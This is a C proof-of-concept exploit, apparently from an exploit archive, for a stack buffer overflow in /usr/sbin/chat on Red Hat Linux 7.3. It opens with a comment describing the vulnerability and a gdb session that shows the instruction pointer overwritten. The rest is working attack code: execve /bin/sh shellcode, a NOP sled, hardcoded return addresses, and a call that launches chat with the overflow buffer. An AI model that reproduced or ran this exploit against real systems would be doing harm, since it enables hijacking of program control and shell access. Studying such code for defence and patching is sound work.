Proof of concept exploit for /usr/sbin/chat on RedHat Linux 7.3. Note: chat is not setuid by default on most installations.
c9a281b9044a9467791c8614d54bcf288295b2f5098c342bdf3f19623a7da630
/*
*** Copyright (C) NrAziz
*
*** /usr/sbin/chat on Red Hat 7.3
*
*** polygrithm@hotmail.com
*
*** Greets to my good friend (Rave)*(Mixter)/Mercy(remember helpforexe??)+(Gorny).
*/
/*
********************** VULNERABILITY *************************
* 1. Definition:
*
* The chat program defines a conversational exchange between
* the computer and the modem. Its primary purpose is to
* establish the connection between the Point-to-Point Proto-
* col Daemon.
*
* 2. Detail:
* There is a buffer overflow vulnerability in the chat program that can be
* exploited by putting data more than 1052, will cause the buffer to over
* flow.
*
*
* 3. Detection:
* The chat program on Linux 7.3 was found vulnerable, others not tested.
*
* [nraziz@nraziz codes]$ gdb /usr/sbin/chat
* GNU gdb Red Hat Linux (5.1.90CVS-5)
* Copyright 2002 Free Software Foundation, Inc.
* GDB is free software, covered by the GNU General Public License, and you are
* welcome to change it and/or distribute copies of it under certain conditions.
* Type "show copying" to see the conditions.
* There is absolutely no warranty for GDB. Type "show warranty" for details.
* This GDB was configured as "i386-redhat-linux"...
* (no debugging symbols found)...
* (gdb) run `perl -e 'print "A" x 1056'`
* Starting program: /usr/sbin/chat `perl -e 'print "A" x 1056'`
* (no debugging symbols found)...(no debugging symbols found)...
* Program received signal SIGSEGV, Segmentation fault.
* 0x41414141 in ?? ()
* (gdb)info all
* eax 0x804cc88 134532232
* ecx 0x0 0
* edx 0x422 1058
* ebx 0x41414141 1094795585
* esp 0xbffff290 0xbffff290
* ebp 0x41414141 0x41414141
* esi 0x41414141 1094795585
* edi 0x41414141 1094795585
* eip 0x41414141 0x41414141 <---------eip overwritten
* ^^^ ^^^^^^^^^^ ^^^^^^^^^^
*
****************************************************************
*/
/*
* Exploit Goes Here
*/
#include <stdio.h>
#include <stdlib.h>
char shellcode[] =
"\x31\xc0" /* xor %eax, %eax */
"\x50" /* push %eax */
"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */
"\x89\xe3" /* mov %esp,%ebx */
"\x50" /* push %eax */
"\x53" /* push %ebx */
"\x89\xe1" /* mov %esp,%ecx */
"\x31\xd2" /* xor %edx,%edx */
"\xb0\x0b" /* mov $0xb,%al */
"\xcd\x80"; /* int $0x80 */
#define BSIZE 1054
//#define RET 1056
/*
* Both the RET works :)
*/
//#define RET 0xbffffa14
#define RET 0xbffff94c
int main(int argc,char **argv)
{
int bsize=BSIZE;
char *buffer;
int i;
unsigned long retaddr=RET;
if(argc>1) bsize=atoi(argv[1]);
buffer=(char *)malloc(sizeof(char)*bsize);
fprintf(stderr,"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n");
fprintf(stderr,"chat Xploit for Linux 7.3 by NrAziz\n");
fprintf(stderr,"Using address:%p\n",retaddr);
fprintf(stderr,"N R A Z I Z\n");
fprintf(stderr,"polygrithm @ hotmail.com\n");
fprintf(stderr,"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n");
for(i=0;i<bsize;i+=4)
*(long *)&buffer[i]=retaddr;
for(i=0;i<bsize-strlen(shellcode)-100;i++)
*(long*)&buffer[i]=0x90;
memcpy(buffer+i,shellcode,strlen(shellcode));
execl("/usr/sbin/chat","chat",buffer,NULL);
return 0;
}